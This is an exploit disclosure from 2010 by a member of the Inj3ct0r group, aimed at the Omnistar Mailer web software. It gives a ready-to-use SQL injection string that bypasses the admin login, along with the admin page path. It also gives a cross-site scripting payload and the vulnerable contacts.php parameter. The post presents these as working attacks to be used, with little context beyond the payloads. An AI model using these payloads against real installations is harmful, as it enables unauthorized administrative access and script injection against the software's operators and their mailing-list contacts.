1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Omnistar Mailer SQLi Vulnerability
Date : june, 21 2010
Critical Level : HIGH
Vendor Url : http://www.omnistarmailer.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends luv y0 guyz
#######################################################################################################
Description:
Are you a business and your are looking to increase your profit? Omnistar mailing list software will allow you to send campaigns and professional html emails to your customers and potential customers in no time at all.
#######################################################################################################
Xploit:AUTH BYPASS Vulnerability
USE ' or 1=1 or ''=' in both username and password and you are in
DEMO URL
http://server/mailerd4/admin/index.php
###############################################################################################################
Xploit:XSS Vulnerability
Attack pattern :"><script>alert("Sid3^effects")</script>
demo url :http://server/mailerd4/admin/contacts.php?op=[xss]
###############################################################################################################
# 0day no more
# Sid3^effects